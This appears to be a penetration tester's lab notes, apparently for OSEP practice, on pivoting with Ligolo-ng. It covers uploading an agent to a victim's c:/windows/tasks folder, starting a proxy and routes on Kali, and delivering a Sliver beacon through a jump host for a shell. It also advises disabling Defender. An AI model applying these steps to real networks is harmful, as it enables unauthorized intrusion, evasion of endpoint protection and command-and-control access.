Ligolo
TIP: Make sure defender is disabled or ligolo might get removed
Subnet Access
1) Upload the agent
upload /home/kali/tools/ligolo-ng/agent.exe c:/windows/tasks/agent.exe
ls c:/windows/tasks/agent.exe2) Start the ligolo proxy on kali
sudo /home/kali/tools/ligolo-ng/proxy -selfcert -laddr 10.10.10.11:44443) Delete the interfaces if already exist (in case ip ranges change on next connection)
interface_delete --name osep-challenge
interface_delete --name osep-challenge-vault4) After starting, create a interface and assign route
interface_create --name osep-challenge
interface_route_add --name osep-challenge --route 10.10.100.0/245) Add another one
6) Connect from the victim machine back to attacker machine with interactive shell
7) Select the session
8) Start the tunnel
Port Forwarding
1) Create listener (from jump01:8000 -> kali:80)
2) We'll use the IP of Jump01 - 10.10.250.10
3) Generate sliver beacon - IP of jump01
4) Get the sliver beacon
5) Get shell access
6) Create another listener (from jump01:8090 -> sliver:8088)
7) Run the .exe
Last updated